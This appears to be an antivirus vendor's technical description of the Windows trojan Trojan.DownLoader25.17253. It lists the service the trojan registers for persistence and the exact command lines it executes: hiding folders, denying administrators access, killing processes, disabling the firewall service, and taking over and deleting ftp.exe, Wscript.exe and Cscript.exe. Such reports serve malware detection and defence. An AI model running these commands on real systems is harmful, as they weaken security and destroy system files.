Trojan.DownLoader25.17253

Technical Information

To ensure autorun and distribution:

Creates the following services:

[<HKLM>\SYSTEM\ControlSet001\Services\clr_optimization_v4.0.32329] 'ImagePath' = '%WINDIR%\Fonts\haabscedtd\Msiexec.exe'
[<HKLM>\SYSTEM\ControlSet001\Services\clr_optimization_v4.0.32329] 'Start' = '00000002'

Malicious functions:

Executes the following:

'<SYSTEM32>\cmd.exe' /c Attrib -s -a -h -r %WINDIR%\debug\Update_Windows.exe&Attrib -s -a -h -r %WINDIR%\debug\debug.exe&Attrib -s -a -h -r %WINDIR%\debug\debug.bat&Attrib -s -a -h -r %WINDIR%\debug\dll.bat
'<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\debug\debug.bat /T /grant administrators:F
'<SYSTEM32>\cacls.exe' %WINDIR%\debug\dll.bat /T /grant administrators:F
'<SYSTEM32>\cmd.exe' /c del /Q /F %WINDIR%\Debug\*.bat %WINDIR%\Debug\*.exe
'<SYSTEM32>\cacls.exe' %WINDIR%\debug\debug.exe /T /grant administrators:F
'<SYSTEM32>\taskkill.exe' /F /T /IM debug.exe /IM Update_Windows.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /T /IM debug.exe /IM Update_Windows.exe
'%WINDIR%\Fonts\halbmcpd\WUDFhost.exe'
'<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\debug\dll.bat /T /grant administrators:F
'<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\debug\debug.exe /T /grant administrators:F
'<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\debug\Update_Windows.exe /T /grant administrators:F
'<SYSTEM32>\attrib.exe' -s -a -h -r %WINDIR%\debug\dll.bat
'<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\wk.ini" /grant administrators:F
'<SYSTEM32>\cmd.exe' /c Attrib +s +a +h +r "%WINDIR%\Fonts\wk.ini"&Cacls "%WINDIR%\Fonts\wk.ini" /t /e /c /d administrator
'<SYSTEM32>\attrib.exe' +s +a +h +r "%WINDIR%\Fonts\wk.ini"
'<SYSTEM32>\attrib.exe' -s -a -h -r "%WINDIR%\Fonts\wk.ini"
'<SYSTEM32>\attrib.exe' -s -a -h -r %WINDIR%\debug\debug.bat
'<SYSTEM32>\cacls.exe' %WINDIR%\debug\Update_Windows.exe /T /grant administrators:F
'<SYSTEM32>\attrib.exe' -s -a -h -r %WINDIR%\debug\Update_Windows.exe
'<SYSTEM32>\cacls.exe' %WINDIR%\debug\debug.bat /T /grant administrators:F
'<SYSTEM32>\cmd.exe' /c echo Y|cacls "%WINDIR%\Fonts\wk.ini" /grant administrators:F& Attrib -s -a -h -r "%WINDIR%\Fonts\wk.ini"
'<SYSTEM32>\attrib.exe' -s -a -h -r %WINDIR%\debug\debug.exe
'<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\wk.ini" /t /e /c /d administrator
'<SYSTEM32>\sc.exe' config sharedaccess start= disabled
'<SYSTEM32>\cmd.exe' /c sc config sharedaccess start= disabled
'<SYSTEM32>\cmd.exe' /c takeown /f <SYSTEM32>\ftp.exe&takeown /f <SYSTEM32>\Wscript.exe&takeown /f <SYSTEM32>\Cscript.exe
'<SYSTEM32>\cmd.exe' /S /D /c" echo Y"
'<SYSTEM32>\cmd.exe' /c echo Y|cacls <SYSTEM32>\ftp.exe /grant administrators:F&echo Y|cacls <SYSTEM32>\Wscript.exe /grant administrators:F&echo Y|cacls <SYSTEM32>\Cscript.exe /grant administrators:F
'<SYSTEM32>\net1.exe' stop sharedaccess
'<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\haabscedtd" /t /e /c /d administrator
'<SYSTEM32>\attrib.exe' +r +h +s "%WINDIR%\Fonts\haabscedtd"
'%WINDIR%\Fonts\haabscedtd\Msiexec.exe'
'<SYSTEM32>\net.exe' stop sharedaccess
'<SYSTEM32>\cmd.exe' /c net stop sharedaccess
'<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\halbmcpd" /t /e /c /d administrator
'<SYSTEM32>\cmd.exe' /c Cacls "%WINDIR%\Fonts\halbmcpd" /t /e /c /d administrator
'<SYSTEM32>\cmd.exe' /c attrib +r +h +s "%WINDIR%\Fonts\wk.ini"
'<SYSTEM32>\cmd.exe' /c Cacls "%WINDIR%\Fonts\wk.ini" /t /e /c /d administrator
'<SYSTEM32>\attrib.exe' +r +h +s "%WINDIR%\Fonts\wk.ini"
'<SYSTEM32>\attrib.exe' +r +h +s "%WINDIR%\Fonts\halbmcpd"
'<SYSTEM32>\cacls.exe' <SYSTEM32>\Wscript.exe /grant administrators:F
'<SYSTEM32>\cacls.exe' <SYSTEM32>\ftp.exe /grant administrators:F
'<SYSTEM32>\cacls.exe' <SYSTEM32>\Cscript.exe /grant administrators:F
'<SYSTEM32>\cmd.exe' /c attrib +r +h +s "%WINDIR%\Fonts\halbmcpd"
'<SYSTEM32>\cmd.exe' /c del /F /Q <SYSTEM32>\ftp.exe <SYSTEM32>\Wscript.exe <SYSTEM32>\Cscript.exe